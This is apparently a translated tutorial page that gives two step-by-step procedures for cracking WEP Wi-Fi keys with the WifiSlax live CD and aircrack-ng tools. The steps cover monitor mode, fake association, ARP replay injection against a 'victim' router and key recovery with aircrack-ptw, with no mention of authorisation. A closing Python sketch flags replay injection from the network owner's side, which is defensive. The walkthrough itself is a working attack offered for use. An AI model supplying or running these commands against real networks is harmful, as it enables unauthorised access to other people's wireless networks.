WiFiSlax WEP Hack Steps

1. Download Wifislax from the official page.
2. Burn the downloaded .iso onto a CD in order to boot it.
3. Reboot the computer (if necessary) and boot from the CD.
4. Press Enter when necessary.
5. Select the option no pcmcia and press Enter.
6. Enter root as the user and toor as the password in order to log in.
7. Now enter startx to start the operating system in graphics mode.
8. Go to Start> Wifislax> Asistencia Chipset> Asistencia intel pro wireless> Cargar ipw3945
inyección - ipwray-ng; to start injection mode. The system must now detect 2 more network card
interfaces: wifi0 and rtap0.
9. In the shell that has just appeared, type airodump-ng wifi0.
10. Look at which WEP-encrypted network (ENC category) has the most Beacons, and pay
special attention to which channel it is on (CH category) and what its name is (ESSID category). That
will possibly be the network with the strongest received signal.
11. Press Ctrl+C and enter airoway.sh.
12. Move the cursor to the channel of the wanted network and press Enter when the wanted
network appears.
13. Select the network by the number associated with it.
14. Press number 2. Some information referring to an association will appear. If you succeed,
this will appear: Association successful :-).
15. Press number 3. Some information referring to a reply will appear.
16. Now wait until attack 3 (the step just described) begins to catch ARPs and the #Data category
reaches 30000.
17. Press number 8 when you have collected the required Data. Some red letters
and numbers will appear. If you succeed, KEY FOUND must appear at the bottom of the window.
18. Write both keys (HEX and ASCII respectively) on a piece of paper.

Tips
• Pay special attention to the encryption of the network: it must be WEP, not WPA.
• Sometimes the #Data needed is greater than 30000 packets. Sometimes 1000000 packets are
necessary to crack the key.
• To know if your computer has the IPW3945 chipset, you can execute the command
ipconfig /all in Windows' MS-DOS. You have to look for Intel PRO/Wireless 3945ABG Network
Connection. In other operating systems, like Linux-based ones, you can download programs like
hardinfo to obtain a complete list of your computer's hardware, which will include
the chipset of your NIC. This chipset is very common on laptops.
• If attack 2 (when you press number 2) doesn't succeed, you have to try again later or crack another
network.
• The Wifislax live CD sometimes crashes or doesn't recognize the injection interfaces. The
solution to this is rebooting the operating system.

Things You'll Need


• A computer whose NIC has IPW3945 as its chipset.
• Wifislax 3.1 burned to a CD.
• A computer able to boot live CDs.

###################### ANOTHER #########################

(1) On Windows, use Netstumbler or InSSIDer to find out the network's

- SSID
- MAC address
- channel

(2) In WiFiSlax, check which network card to use

iwconfig

(3) Start monitor mode on channel 1

airmon-ng start wlan0 1

(4) Write the packets returned on channel 1 to the file f1

airodump-ng -w f1 -c 1 wlan0

(5) Create the association between the network card and the network's router

aireplay-ng -1 30 -e BSSIDVitima -a MACVitima -h MACNosso wlan0

(6) Inject packets into the victim's router

aireplay-ng -3 -x600 -b MACVitima -h MACNosso wlan0

(7) Wait until it has captured at least >100000 packets

(8) In a new shell, start the crack

aircrack-ptw f1-01.cap
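
Seen from the network owner's side, the packet injection in step (6) (attack 3 in the first procedure) appears on the air as one station sending encrypted broadcast frames of identical length at a high, steady rate. The Python sketch below is an added example, not part of the original page, that flags that pattern; the frame tuples, MAC addresses, frame length, window and threshold are constructed assumptions, and real records would come from a monitor-mode capture of your own network.

```python
from collections import defaultdict, deque

BROADCAST = "ff:ff:ff:ff:ff:ff"


def find_replay_sources(frames, window=1.0, threshold=200):
    """Flag stations that flood identical-length encrypted broadcast frames.

    frames: iterable of (timestamp_s, src_mac, dst_mac, length, protected).
    Returns {src_mac: (frame_length, peak_count_within_window)}.
    window and threshold are assumed tuning values, not taken from the page.
    """
    recent = defaultdict(deque)  # (src, length) -> timestamps still in window
    peaks = {}
    for ts, src, dst, length, protected in sorted(frames):
        if not protected or dst != BROADCAST:
            continue  # only encrypted broadcast traffic is of interest here
        q = recent[(src, length)]
        q.append(ts)
        while ts - q[0] > window:  # drop timestamps older than the window
            q.popleft()
        if len(q) >= threshold and len(q) > peaks.get(src, (0, 0))[1]:
            peaks[src] = (length, len(q))
    return peaks


def sample_frames():
    """Constructed sample: one ordinary client and one replaying station."""
    frames = []
    client, ap, noisy = ("02:00:00:00:00:10", "02:00:00:00:00:01",
                         "02:00:00:00:00:66")
    # Ordinary client: an occasional broadcast plus unicast data of varying size.
    for i in range(10):
        frames.append((i * 3.0, client, BROADCAST, 68, True))
        frames.append((i * 3.0 + 0.5, client, ap, 300 + i, True))
    # Replaying station: the same 68-byte frame 600 times per second for 5 s,
    # matching the -x600 rate used in step (6).
    for i in range(3000):
        frames.append((10.0 + i / 600.0, noisy, BROADCAST, 68, True))
    return frames


if __name__ == "__main__":
    for src, (length, count) in find_replay_sources(sample_frames()).items():
        print(f"possible replay: {src} sent {count} x {length}-byte "
              f"broadcast frames within 1 s")
```

A hit is a reason to move the network off WEP, which the Tips above note is the only encryption this procedure works against.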
###################### ANOTHER #########################
